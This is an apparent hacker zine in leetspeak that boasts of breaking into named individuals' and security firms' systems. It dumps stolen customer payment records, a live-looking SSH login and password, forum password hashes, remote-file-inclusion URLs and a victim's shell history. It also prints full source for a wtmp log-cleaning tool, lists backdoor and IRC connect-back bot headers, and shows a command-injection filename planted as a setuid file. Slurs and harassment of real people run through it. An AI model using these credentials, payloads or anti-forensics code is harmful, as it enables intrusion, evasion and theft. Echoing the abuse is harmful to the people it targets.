sshd:x:33:33:sshd:/:
konewka:x:1000:100:***********,,,:/home/konewka:/bin/bash
free:x:1005:100:FTP,,,:/home/free:/bin/false
konewka@olek:~$ cd b0x
konewka@olek:~/b0x$ ls
mcux.txt gwee-1.36 m0d.txt matrix.txt mod.pl ns/ tar.tar.gz
konewka@olek:~/b0x$ cat cux.txt
First Name Jim
Last Name [edited]
Address [edited]
City [edited]
State NC
Post Code [edited]
Email [edited]
Phone [edited]
Payment Information
Payment Type Visa
Name on Card James [edited]
Card Number [edited]
Expiry Date mm/yy [edited]
Card Holder Address [edited]
Authorization CVN [edited]
Shipping Information
Shipping Method Ground
Weight=10.1499999761581
First Name Dana
Last Name [edited]
Address [edited]
City [edited]
State OR
Post Code [edited]
Country US
Email [edited]
Phone [edited]
Payment Information
Payment Type Visa
Name on Card [edited]
Card Number [edited]
Expiry Date mm/yy [edited]
Card Holder Address [edited]
Authorization CVN [edited]
Shipping Information
Shipping Method Next Day Air
Weight=8
Ship to Name [edited]
Ship to Address [edited]
Ship City [edited]
Ship State IN
Ship Post Code [edited]
Ship Country US
Customer Information
First Name Marlene
Last Name [edited]
Address [edited]
City [edited]
State TN
Post Code [edited]
Country US
Email [edited]
Phone [edited]
Payment Information
Payment Type Visa
Name on Card Marlene [edited]
Card Number [edited]
Expiry Date mm/yy [edited]
Card Holder Address [edited]
Authorization CVN [edited]
Shipping Information
Shipping Method Ground
Weight=25
Ship to Name Marlene [edited]
Ship to Address [edited]
Ship City [edited]
Ship State TN
Ship Post Code [edited]
Ship Country US
Customer Information
First Name Michael
Last Name [edited]
Address [edited]
City [edited]
State TX
Post Code [edited]
Country US
Email [edited]
Phone [edited]
Payment Information
Payment Type Visa
Name on Card Michael [edited]
Card Number [edited]
Expiry Date mm/yy [edited]
Card Holder Address [edited]
Authorization CVN [edited]
Shipping Information
Shipping Method Ground
Weight=15.2000000476837
Customer Information
First Name Paula
Last Name [edited]
Address [edited]
City [edited]
State ME
Post Code [edited]
Country US
Email [edited]
Phone [edited]
Payment Information
Payment Type Visa
Name on Card Paula [edited]
Card Number [edited]
Expiry Date mm/yy [edited]
Card Holder Address [edited]
Authorization CVN [edited]
Shipping Information
Shipping Method Ground
Weight=8
konewka@olek:~/b0x$ cat m0d.txt
217.115.176.3
port - 22
proto - ssh
user - bes
pass - gbpltw
**************
konewka@olek:~/b0x$ head -n2 matrix.txt
http://vvmu.isot.ru/index.php?page=http://zerkalodeface.narod.ru/universal.php
http://ezonet.ru/index.php?page=http://zerkalodeface.narod.ru/universal
konewka@olek:~/b0x$ cd ../w0rkz
konewka@olek:~/w0rkz$ ls
eric-client.c evil.php kenny-smart.c mybindshell.c sesje.bash*
eric.c kenny* log_clean.c priv8kenny.c tvn.c
konewka@olek:~/w0rkz$ head -n6 eric.c
/*
** eric.c - Fri May 12 2004
** Linux backdoor with terminal support.
** Compile with -lutil flag.
** konewka/roSEC
*/
konewka@olek:~/w0rkz$ head -n5 eric-client.c
/*
** eric-client.c - Fri May 12 2004
** Simple client which connects to your eric backdoor
** konewka/roSEC
*/
konewka@olek:~/w0rkz$ head -n15 kenny-smart.c
/*
** kenny.c by konewka <konewka@eviltime.com>
**
** Simple IRC bot, that can execute shell commands and print it out
** to you. With this bot you may execute shell commands with full anonymity,
** it's kind of connect back backdoor.
**
** It has been tested on IRCnet and EFnet IRC networks, and should
** compile without any problems on Linux and FreeBSD.
**
** If you want only one certain host to execute commands compile with
** -DMASTERONLY flag and change MASTER define.
**
** Fell free to add your functions, but keep my nickname in credits.
*/
konewka@olek:~/w0rkz$ cat log_clean.c
#include <stdio.h>
#include <utmp.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
int main(int argc, char *argv[]) {
struct utmp ut;
char user[] = "konewka", host[] = "konewka";
int f_in, f_out, ut_len;
if ((f_in = open("/var/log/wtmp", O_RDONLY)) < 0) {
printf("cant open\n");
return -1;
}
if ((f_out = open("wtmp", O_WRONLY|O_CREAT)) < 0) {
printf("cant open to write\n");
return -1;
}
ut_len = sizeof(ut);
while (read(f_in, &ut, ut_len) == ut_len) {
if (!strncmp(ut.ut_user, user, strlen(user)) || !strncmp(ut.ut_host, host, strlen(host)))
;
else
write(f_out, &ut, ut_len);
}
close(f_out);
close(f_in);
return 0;
}
konewka@olek:~/w0rkz$ head -n5 mybindshell.c
/* mybindshell.c coded by konewka (www.olek.org)
* backdoor (bindshell) with password.
* cleaned up code.
* enjoy !
*/
konewka@olek:~/w0rkz$ head -n39 priv8kenny.c
/*
** priv8kenny.c by konewka <konewka@eviltime.com>
**
** Simple IRC bot, that can execute shell commands and print it out
** to you. With this bot you may execute shell commands with full anonymity,
** it's kind of connect back backdoor.
**
** It has been tested on IRCnet and EFnet IRC networks, and should
** compile without any problems on Linux and FreeBSD.
**
** Fell free to add your functions, but keep my nickname in credits.
**
** Few words about the usage, the best way is to take a look into source.
** Anyway, when bot successfuly joined our channel, you can:
** - Exec commands by !sh <command>
** - Join/part channels by !part/!join <#channel_name>
** - Op/Deop users by !op/deop <user1> [user2] [user3]
** - Select random nick and then voice or kick him by !random voice/kick
** - To quit use !exit
**
** Changes:
** - Added next "war" option - mass deop (!mdeop)
** - Added mass kick - !mkick or !mkick noops to kick only users without op
** - Added simple userlist and kick protection on users (change users array)
** - Added timer in port_scan() and service display
** - Added ping reply while connecting on some irc servers (irc.0x333.org)
** - Added ctcp version reply
** - Added reconnect()
** - Added mass deop protection, on d4rkgr3y request :)
** - Added !scan - use !scan <nickname> or <hostname>
** - Added !script and !run that allow you to program your bot, e.g.
** !script mode #ch +i;privmsg #ch :haha :) and !run to execute instructions
** - Added !say - syntax should look like this !say <nick/#chan> :message text
** - Added !where to locate bot
** - Fixed bot.nick overwrite
** - Added !op and terrific random kick/voice - !random kick/voice.
** - Fixed process hide (port).
** - Fixed Since now errors from execution wont be printed to terminal.
*/
konewka@olek:~/w0rkz$ head -n8 tvn.c
/* copyright (c) konewka
* moje malenstwo do sprawdzania rozkladu jazdy na stacji TVN (uwielbiam wasza telewizje)
* polecam uzywac razem z jakims edytorem strumieniowym, sed, awk (..)
* PRZEGLADAC Z MORE'em ! :)
*
* Pozdrawiam Tomasza Lisa.
*
*/
konewka@olek:~/w0rkz$
wh4t a h4q3r! th1z k1d w4st3z m0r3 t1m3 c0d1ng p01ntl3zz to0lz th4n synapze 0n
th3 w33k3ndz h3 h4z c0k3.
02.txt -~-~-~ ri0t c0d3z
ri0t m1lw0rmz m0r3 3xpl01tz th4n a h4q3d ES ftpd. h3z n0t g01ng t0 qu1t s3cur1ty
c4uz3 h3'z g41n1ng m0r3 f4m3 th4n ph0bos & cold-fire fr0m t3chtv r3runz! 3xp0s3d
1n r3sp3ct4bl3 full d1zcl0sur3 f4zz10n.
y0ur c0de suqz. y0ur s1t3 suqz. y0u sm3ll 0f sh33p f3c3z. 3y3 th1nk y0u n33d t0
t4k3 4n 0nl1n3 w3b d3s1gn c0urz3 0r s0m3th1ng. fuqn d0rk.
j4q:/Users/anybody/fuzz j4q$ echo '' > '`ls>abc`'
j4q:/Users/anybody/fuzz j4q$ chmod 7777 '`ls>abc`'
j4q:/Users/anybody/fuzz j4q$ su anybody
Password:
anybody:~/fuzz anybody$ wget http://www.ri0tnet.net/fuzzyri0t.tar.gz
anybody:~/fuzz anybody$ tar -zxvf fuzzyri0t.tar.gz
fuzzyri0t.pl
anybody:~/fuzz anybody$ ls -al
total 24
drwxrwxrwx 4 anybody 14790 136 Jul 24 04:09 .
drwxrwxrwx 56 anybody 14790 1904 Jul 24 04:07 ..
-rwsrwsrwt 1 j4q 14791 1 Jul 24 04:07 `ls>abc`
-rw-r--r-- 1 anybody 14790 6618 Jul 24 04:08 fuzzyri0t.pl
anybody:~/fuzz anybody$ perl fuzzyri0t.pl
What task would you like to perform?
[0] Input target program manualy.
[1] Select target program from a list of all suid programs.
[2] Display all world writeable files on the system.
[3] Display all world writeable directories on the system.
[4] Exit.
Please input choice: 1
Finding all suid programs on the system this will only occur once please wait.....
[0] /bin/df
[1] /bin/ps
[2] /bin/rcp
[3] /dev/fd/3/`ls>abc`
[4] /sbin/launchd
[5] /sbin/mount_nfs
[6] /sbin/mount_smbfs
[7] /sbin/ping
[8] /sbin/ping6
[9] /sbin/restore
[10] /sbin/route
[11] /sbin/rrestore
[12] /sbin/umount
[13] /Users/anybody/fuzz/`ls>abc`
[14] /usr/bin/at
[15] /usr/bin/atos
[16] /usr/bin/atq
[17] /usr/bin/atrm
[18] /usr/bin/batch
[19] /usr/bin/chfn
[20] /usr/bin/chpass
[21] /usr/bin/chsh
[22] /usr/bin/crontab
[23] /usr/bin/edit
[24] /usr/bin/fetchmail
[25] /usr/bin/heap
[26] /usr/bin/leaks
[27] /usr/bin/lockfile
[28] /usr/bin/login
[29] /usr/bin/lppasswd
[30] /usr/bin/malloc_history
[31] /usr/bin/nfsstat
[32] /usr/bin/passwd
[33] /usr/bin/procmail
[34] /usr/bin/quota
[35] /usr/bin/rlogin
[36] /usr/bin/rsh
[37] /usr/bin/sample
[38] /usr/bin/setregion
[39] /usr/bin/smbutil
[40] /usr/bin/su
[41] /usr/bin/sudo
[42] /usr/bin/top
[43] /usr/bin/vmmap
[44] /usr/bin/wall
[45] /usr/bin/write
[46] /usr/sbin/lsof
[47] /usr/sbin/netstat
[48] /usr/sbin/postdrop
[49] /usr/sbin/postqueue
[50] /usr/sbin/pppd
[51] /usr/sbin/screenreaderd
[52] /usr/sbin/scselect
[53] /usr/sbin/traceroute
[54] /usr/sbin/traceroute6
[55] /usr/sbin/trpt
[56] /usr/sbin/vpnd
Please select desired target: 13
running program with no options to get usage settings.
sh: line 1: /Users/anybody/fuzz/: is a directory
Please input any optional switches you would like to use with the target program:
Please select attack payload
[0] Standard Buffer Overflow
[1] Standard Format String
[2] Custom Attack Payload
[3] Main Menu
Please input choice: 3
What task would you like to perform?
[0] Input target program manualy.
[1] Select target program from a list of all suid programs.
[2] Display all world writeable files on the system.
[3] Display all world writeable directories on the system.
[4] Exit.
Please input choice: 4
anybody:~/fuzz anybody$ ls -al
total 32
drwxrwxrwx 5 anybody 14790 170 Jul 24 04:11 .
drwxrwxrwx 56 anybody 14790 1904 Jul 24 04:07 ..
-rwsrwsrwt 1 j4q 14791 1 Jul 24 04:07 `ls>abc`
-rw-r--r-- 1 anybody 14790 26 Jul 24 04:11 abc
-rw-r--r-- 1 anybody 14790 6619 Jul 24 04:11 fuzzyri0t.pl
anybody:~/fuzz anybody$
th4nkz t0 0ur 0d4y 0SX p0rt 0f f1l3fuzz w3 w3r3 4bl3 t0 sp0t th1z s3cur1ty h0l3
(bd) b3f0r3 ri0t c0uld uz3 1t 4g41nst uz!@ f33l fr33 t0 us3 1t & m4k3 ri0t rm
h1ms3lf. w3 w1ll tr4d3 4n 3xpl01t 4g41nztfuzzyri0t f0r a r3m0t3 psybnc 0r r3m0t3
cvs 0d4y. 3m41l dvdman@l33tsecurity.com t0 w0rk 0ut d3t41lz (s3nd pic@#$!).
03.txt -~-~-~ sabre-security
az yu0 all kn0w, sabre-secur1ty releazes some el1te auditing t00lz. h4LvaR fl4ke
iz a g3niuz but h3 k4nt s33m to sekure h1z shit w3ll... s0 w3 had t0 0wn hiz
f0rumz!! i mean sh1t, wr1ting all th3ze sec t00lz iz r34lly h4rd 0r s0meth1ng &
secur1ng a f0rum muzt be ev3n hard3r!
http://www.sabre-security.com/forum/simpleforum_files/forum_01/forum.info
<forum_name>SABRE BinDiff</forum_name>
<forum_more>Discussions of SABRE BinDiff, binary diffing and IDB migration in general</forum_more>
<forum_pass>SiawRaNQeVgkI</forum_pass>
<forum_perm>normal</forum_perm>
http://www.sabre-security.com/forum/simpleforum_files/forum_02/forum.info
<forum_name>SABRE BinNavi</forum_name>
<forum_more>Discussions of SABRE BinNavi, graph-based debugging and input crafting</forum_more>
<forum_pass>SifafLvA6kS8o</forum_pass>
<forum_perm>normal</forum_perm>
http://www.sabre-security.com/forum/simpleforum_files/forum_03/forum.info
<forum_name>SABRE BinAudit</forum_name>
<forum_more>Discussions of SABRE BinAudit, automated static analysis of executables, dataflow analysis</forum_more>
<forum_pass>SiJQ4YtHtAqFE</forum_pass>
<forum_perm>normal</forum_perm>
http://www.sabre-security.com/forum/simpleforum_files/forum_04/forum.info
<forum_name>General RE</forum_name>
<forum_more>General discussion of matter related to binary analysis</forum_more>
<forum_pass>Si/QbwJMRBLNs</forum_pass>
<forum_perm>normal</forum_perm>
http://www.sabre-security.com/forum/simpleforum_files/simpleforum.conf
wh0a d00dz, s1nce wh3n are sekur1ty pr0fessi0nalz
supp0z3d t0 leav3 their syst3mz open th1z wide?@
admin_password:SiD7JOBQAe6Y2
images_dir:simpleforum_files/images
h3y skew, if yu0'r3 read1ng th1z sh1t, n0w iz th3
tim3 t0 sshbrute th3 fuq outta the s3rv3r.
0h and mak3 sur3 y0u craq th3ze. w3 are n0t
capabl3 0f such elite taskz. h4r h4r h4r!@!($@#
title:SABRE Security User Forum
home_name:Home
home_url:http://www.sabre-security.com/content.html
hour_difference:0
hoursystem:12
date_notation:ddmmyy
html_protection:on
bbcode:on
smileys:on
author_edit:on
backgroundcolor:#FFFFFF
backgroundimage:simpleforum_files/images/background.gif
tablecolor1:#E9E6E6
tablecolor2:#D8D7D7
tablecolor3:#F8F7F7
tablebordercolor:#555555
tablewidth:93%
postformbackground:#E9E6E6
fontface:verdana,arial
fontsize:9
fontsizesmall:8
fontcolor:#555555
topics_per_page:10
posts_per_page:20
popularnumb:15
link_color:#E27153
visited_link_color:#E27153
link_hover_color:#CC6666
language:English
mail:off
admin_email:
mailprog:/usr/sbin/sendmail
admin_email_notify:off
show_email_addresses:off
attachments_dir:simpleforum_files/attachments
attachments_url:simpleforum_files/attachments
allow_attachments:yes
attachments_uploadmax:1024000
m4ybe y0u fuck3rz sh0uld BinNavi y0ur 0wn CGI, h4 h4r h4r!!
w3've alw33z want3d t0 be devel0perz f0r sabre BinNavi,
and eye th1nk luQ sh1ned d0wn up0n uz:
<post>
<name>halvar.flake</name>
<ip>***.**.***.**</ip>
<email>halvar.flake@sabre-security.com</email>
<subject>Welcome ...</subject>
<time>1101219538</time>
<message>... if you can read this, you're a developer for SABRE BinNavi :-)
</message>
</post>
<post>
<name>SË.ren Meyer-Eppler</name>
<ip>**.***.***.***</ip>
<email>soeren.meyer-eppler@BuschnicK.net</email>
<subject>Re: Welcome ...</subject>
<time>1101233402</time>
<message>that I am I guess ;-)
</message>
</post>
halvar, y0u muzt 4dd 'h0no' to ur lizt 0f develop3rz,
y0u w1ll appreciat3 0ur c0ntributi0n t0 y0ur sekur1ty f1rm!
<post>
<name>Halvar Flake</name>
<ip>**.***.***.**</ip>
<email>halvar.flake@sabre-security.com</email>
<subject>SABRE BinNavi beta testers</subject>
<time>1113951197</time>
<message>Hey all,
we're looking for 1-2 adventurous customers that would like
to try out the beta version of SABRE BinNavi for a bit. Any
volunteers ? :)
Cheers,
Halvar
-~-~-~
h0no 4lr34dy h4z B1nN4v1 b3t4. full 0f fmtstr1ng bugz.
-~-~-~
</message>
</post>
<post>
<name>Dennis</name>
<ip>**.***.***.***</ip>
<email></email>
<subject>Re: SABRE BinNavi beta testers</subject>
<time>1113978612</time>
<message>Sure, I'd definately be interested!
Should I contact you by email ? ;-)
-~-~-~
y3z, h0p3fully a f3ll0w #darknet m3mb3r h4z 1t sn1ff3d.
-~-~-~
</message>
</post>
<post>
<name>Halvar Flake</name>
<ip>**.***.***.**</ip>
<email>halvar.flake@sabre-security.com</email>
<subject>Re: SABRE BinNavi beta testers</subject>
<time>1114010506</time>
<message>Yes please :-)
</message>
</post>
<post>
<name>Dennis</name>
<ip>**.***.***.***</ip>
<email></email>
<subject>Re: SABRE BinNavi beta testers</subject>
<time>1114172955</time>
<message>Thanks for the beta, HalVar!
I really like this product and I'll definately purchase
a BinNavi license! I'm looking forward to it!
-~-~-~
st0p kiss1ng ass, Dennis! w3 n33d this m0re than y0u!@$
ps. Dennis, it'z 4 tr0j4n.
-~-~-~
</message>
</post>
<post>
<name>halvar.flake</name>
<ip>***.**.***.**</ip>
<email>halvar.flake@sabre-security.com</email>
<subject>If you can read this ...</subject>
<time>1101219695</time>
<message>... I gave you a password
-~-~-~
th4nkz a l0t f0r th1z go0dz!@#
-~-~-~
</message>
</post>
0mg, halvar, w3 are y0ur b3st fanz. eye th1nk w3 des3rve a BinNavi license!
p3rhapz y0u c0uld h00k uz up w1th s0me mad BinNavi w4r3z??!
k33p up the gr8 w0rk, sabre-secur1ty. y0u are 0ur id0lz. btw, az a fri3ndly h0no
suggezti0n (w3 are fri3ndz r1ght?), m4ybe y0u sh0uld B1nN4v1 y0ur 0wn k0d3Z?
s0rry f0r br1nging thiz extr3m3ly m1nd-numb1ng c0nc3pt up, but wh4tz up w1th
th1z sh1T?!$@
c0ngr4tz g0 0ut t0 SË.ren Meyer-Eppler f0r m4k1ng 1t az a n3w BinNav1
dEvElop3r!@$$ m4y y0u kiss a l0t 0f k4lvar ass. (w3 ar3 fuqn j3al0us)
--
h0no n0ticed th4t sabre-security haz n0 sl0gan. if y0u are g0ing int0 the
bizn3zz w0rld, y0u've g0tta have 0ne!!@
az a g3stur3 0f k1ndnezz, w3 h4v3 th0ught 0f 0ne f0r y0u! y0u will uz3 it!!
"SABRE Security - W3 f0rg0t t0 uZe BinAud1t 0n 0urSeLv3z!"
truzt us. 1t w1ll w0rk l1k3 nutz.
--
f0r aLL y0u BinNavi l0v3rz, h0no haz put t0g3ther a sp3cial k0nt3zt f0r y0u.
HOW TO WIN A COPY OF BINNAVI 0DAY W4R3Z!
- s3nd an e-m41L t0 Halvar expla1ning h0w much 0f a f4gg0t h3 1z. wh03ver s3ndz
th3 b3zt e-m4iL t0 h1m g3tz a PHR33 C0PY 0F BINNAVI W1TH A SP3CIAL HALVAR FLAKE
AUTOGR4PH.
th3 c0nt3zt h4z 4lr34dy 3nd3d. dvdm4n w0n.
04.txt -~-~-~ h4rd3n3d php t34m crumbl3z pt 1
l0r14n sur3 1z c0nf1d3nt th4t th3 b0x3z h3 sshz fr0m r s3cur3. t43m d34d3nd-php,
s3cur3!@$@#
(root@c0mp) (/owned/bitchez/) # ssh cf.sourceforge.net -lsesser
sesser@cf.sourceforge.net's password:
Pdmenu
+-------------Choose compile farm server...--------------+
¶ Exit ¶
¶ Z. CompileFarm ShellServer (CentOS 4.2, x86) ¶
¶ ¶
¶ Complete instructions on using the Compile Farm ¶
¶ are available at: http://sf.net/docs/E02/ ¶
¶ ¶
¶ Compile Farm status information available at ¶
¶ http://sf.net/docs/A05/ ¶
¶ ¶
¶ A. [x86] Linux 2.4 (Debian 2.2) ¶
¶ B. [x86] Linux 2.6 (Fedora FC2) ¶
¶ ¶
¶ C. [x86] FreeBSD (4.8) ¶
¶ D. [x86] NetBSD (1.6.1) ¶
¶ ¶
¶ E. [AMD64] Linux 2.6 (Fedora Core 3 on AMD64 Opteron) ¶
¶ F. [AMD64] Linux 2.6 (Fedora Core 3 on AMD64 Opteron) ¶
¶ ¶
¶ G. [Alpha] Linux 2.2 (Debian 3.0) ¶
¶ ¶
+--------------------------------------------------------+
Welcome to Pdmenu 1.2.85 by Joey Hess <joey@kitenet.net>
Last login: Sun Dec 18 12:43:48 2005 from login.cf.sourceforge.net
Welcome to the SourceForge CompileFarm Shellserver.
This host provides a centralized point of access for receiving e-mail
generated by other compile farm hosts (i.e. cron job results). From the
Compile Farm Shell Server, mail may be forwarded to, or be generated to,
SourceForge.net user accounts (username@users.sourceforge.net) and
SourceForge.net project mailing lists
(projectname-listname@lists.sourceforge.net).
Cron jobs may also be scheduled on the Compile Farm shell server, as to
perform automated clean-up of build directories, etc.
As of 2004-01-14, you may now SSH (and SCP, SFTP, rsync over SSH) directly
to this Compile Farm shell server. Information may be found in the
Compile Farm guide (URL below). This host may connect to other Compile
Farm hosts using 'ssh' to the hostnames in: /etc/compilefarm-hosts
A NEW AND IMPROVED guide to the Compile Farm is now available
(updated 2004-10-12) at: https://sourceforge.net/docs/E02/
-bash-3.00$ ls -al
total 1660
drwxr-xr-x 7 sesser users 4096 Dec 11 13:58 .
drwxr-xr-x 42 root root 4096 Nov 29 06:20 ..
-rw------- 1 sesser users 19384 Nov 30 04:41 .bash_history
drwx------ 2 sesser users 4096 Dec 5 2004 .cedit
-rw------- 1 sesser users 131584 Dec 9 2004 core
-rw-r--r-- 1 sesser users 503393 Oct 25 07:24 hardening-patch-4.4.0-0.4.3.patch
-rw------- 1 sesser users 19384 Dec 3 11:09 homebas
-rw------- 1 sesser users 19384 Dec 3 11:09 homebase
-rwxr-xr-x 1 sesser users 800464 Nov 30 04:37 libc.so.1
drwxr-xr-x 3 sesser users 4096 Dec 6 2004 .mc
-rwxr-xr-x 1 sesser users 4683 Dec 13 2004 p
-rw-r--r-- 1 sesser users 204 Dec 13 2004 p.c
drwxr-xr-x 17 sesser users 4096 Oct 28 01:59 php-4.4.0
-rw-r--r-- 1 sesser users 664 Dec 9 2004 sparc.o
-rw-r--r-- 1 sesser users 72 Dec 9 2004 sparc.s
drwxr-xr-x 2 sesser users 4096 Oct 31 23:33 .ssh
-rwxr-xr-x 1 sesser users 9032 Dec 9 2004 t
-rw-r--r-- 1 sesser users 99 Dec 9 2004 t.c
-rw-r--r-- 1 sesser users 725 Dec 6 2004 test.o
-rw-r--r-- 1 sesser users 228 Dec 6 2004 test.s
-rwxr-xr-x 1 sesser users 9324 Nov 27 09:37 tmp
-rwxr-xr-x 1 sesser users 6748 Nov 30 04:34 tmp2
-rwxr-xr-x 1 sesser users 6624 Nov 30 04:36 tmp3
-rw-r--r-- 1 sesser users 278 Nov 30 04:34 tmp.c
-rw------- 1 sesser users 6736 Nov 27 09:36 .viminfo
drwx------ 2 sesser users 4096 Jun 15 2004 .w3m
-rwxr-xr-x 1 sesser users 13411 Dec 5 2004 x
-rwxr-xr-x 1 sesser users 8975 Dec 5 2004 x_alpha
-rw-r--r-- 1 sesser users 1003 Dec 5 2004 x.c
-rwxr-xr-x 1 sesser users 9544 Dec 5 2004 x_ppc
-rw-r--r-- 1 sesser users 1033 Dec 13 2004 xpx
-rwxr-xr-x 1 sesser users 6548 Dec 5 2004 x_sparc
-rwxr-xr-x 1 sesser users 8976 Dec 5 2004 x_sparcv9
-bash-3.00$ cat .bash_history
make
mc
exit
PROMPT_COMMAND='pwd>&7;kill -STOP $$'
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\155\141\151\156'`"
PROMPT_COMMAND='pwd>&7;kill -STOP $$'
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\155\157\144\165\154\145\163'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\155\141\151\156'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071'`"
PROMPT_COMMAND='pwd>&7;kill -STOP $$'
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\145\170\164'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\145\170\164\057\143\164\171\160\145'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\145\170\164'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\155\141\151\156'`"
PROMPT_COMMAND='pwd>&7;kill -STOP $$'
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071'`"
./config.nice
PROMPT_COMMAND='pwd>&7;kill -STOP $$'
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\163\141\160\151\057\143\154\151'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\163\141\160\151'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162'`"
vi test.s
gcc -c test.s
objdump --disassemble test.o
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\145\170\164'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\155\141\151\156'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\151\156\143\154\165\144\145'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\155\141\151\156'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\145\170\164'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\132\145\156\144'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\065\056\060\056\060\122\103\063\056\150\141\162\144\145\156\145\144\056\141\154\160\150\141\057\132\145\156\144'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\132\145\156\144'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\163\141\160\151'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\163\141\160\151\057\143\154\151'`"
vi test.php
gdb php
gdb pgp
gdb php
gdb ./php
gdb pgp
gdb ./php
php test.php
./php test.php
PROMPT_COMMAND='pwd>&7;kill -STOP $$'
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\163\141\160\151\057\143\154\151'`"
./php test.php
gdb ./php
./php test.php
gdb ./php
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\163\141\160\151'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\132\145\156\144'`"
cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071'`"
